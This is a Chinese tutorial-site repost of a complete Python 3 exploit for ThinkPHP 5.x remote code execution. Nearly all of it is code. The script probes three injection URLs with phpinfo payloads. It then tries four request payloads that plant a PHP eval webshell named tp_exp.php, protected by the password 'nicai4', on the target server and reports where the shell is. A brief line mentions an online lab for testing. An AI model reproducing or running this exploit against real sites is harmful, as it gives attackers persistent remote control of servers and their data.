您的位置:首页 > 脚本大全 > > 正文

thinkphp实战教程之博客技术学习(python3编写ThinkPHP命令执行Getshell的方法)

更多 时间:2022-01-22 01:32:02 类别:脚本大全 浏览量:723

thinkphp实战教程之博客技术学习

python3编写ThinkPHP命令执行Getshell的方法

加了三个验证漏洞以及四个getshell方法

  • ?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83
  • 84
  • 85
  • 86
  • 87
  • 88
  • 89
  • 90
  • 91
  • 92
  • 93
  • 94
  • 95
  • 96
  • 97
  • 98
    		•
  • # /usr/bin/env python3
  • # -*- coding: utf-8 -*-
  • # @author: morker
  • # @email: [email]admin@nsf.me[/email]
  • # @blog:  [url]http://nsf.me/[/url]
  •  
  • import requests
  • import sys
  •  
  • def demo():
  •   print(' _______ _   _    _  _____ _  _ _____ ')
  •   print(' |__  __| |  (_)   | | | __ \| | | | __ \ ')
  •   print('  | | | |__ _ _ __ | | _| |__) | |__| | |__) |')
  •   print('''  | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')
  •   print('  | | | | | | | | | |  <| |  | | | | |   ')
  •   print('  |_| |_| |_|_|_| |_|_|\_\_|  |_| |_|_|   ')
  •   print()
  •   print('\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).')
  •   print('\tremote command execution exploit.')
  •   print('\tvulnerability verification and getshell.')
  •   print('\ttarget: http://target/public')
  •   print()
  • class thinkphp():
  •   def __init__(self,web):
  •     self.web = web
  •     self.headers = {
  •     "user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0",
  •     "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  •     "accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2",
  •     "accept-encoding" : "gzip, deflate",
  •     "content-type" : "application/x-www-form-urlencoded",
  •     "connection" : "keep-alive"
  •     }
  •  
  •   def verification(self):
  •     i = 0
  •     s = 0
  •     verifications = ['/?s=index/\\think\request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
  •     while true:
  •       if i == len(verifications):
  •         break
  •       else:
  •         url = self.web + verifications[i]
  •         req = requests.get(url=url,headers=self.headers)
  •         if 'phpinfo()' in req.text:
  •           s = 1
  •           break
  •         else:
  •           s = 0
  •         i += 1
  •     if s == 1:
  •       print("[+] there are vulnerabilities.")
  •       print()
  •       toshell = input("[*] getshell? (y/n):")
  •       if toshell == 'y':
  •         self.getshell()
  •       elif toshell == 'n':
  •         sys.exit()
  •       else:
  •         sys.exit()
  •     else:
  •       print("[-] there are no vulnerabilities.")
  •  
  •   def getshell(self):
  •     getshells = [
  •     '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>',
  •     '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php',
  •     '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php',
  •     '?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>']
  •     shell = self.web + '/tp_exp.php'
  •     i = 0
  •     s = 0
  •     while true:
  •       if i == len(getshells):
  •         break
  •       else:
  •         url = self.web + getshells[i]
  •         req = requests.get(url=url,headers=self.headers)
  •         req_shell = requests.get(url=shell,headers=self.headers)
  •         if req_shell.status_code == 200:
  •           s = 1
  •           break
  •         else:
  •           s = 0
  •         i += 1
  •     if s == 1:
  •       print("[+] webshell :%s password :nicai4" % shell)
  •     else:
  •       print("[-] the vulnerability does not exist or exists waf.")
  •  
  • def main():
  •   demo()
  •   url = input("[*] please input your target: ")
  •   run = thinkphp(url)
  •   run.verification()
  •  
  • if __name__ == '__main__':
  •   main()
    		•

    注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。

    环境地址:https://www.vsplate.com/

    效果图:

    thinkphp实战教程之博客技术学习(python3编写ThinkPHP命令执行Getshell的方法)

    以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。

    原文链接:https://bbs.ichunqiu.com/thread-48729-1-1.html

    标签:ThinkPHP Python3 getshell
  • 上一篇:navicat怎么和mysql连接(Navicat Premium远程连接MySQL数据库的方法)
  • 下一篇:navicat15激活页面不显示(Navicat for MySQL 15注册激活详细教程)
    • 您可能感兴趣
    首页 编程学习 Web前端 数据库 软件设计
    开心学习 ©2013-2021 保留所有权利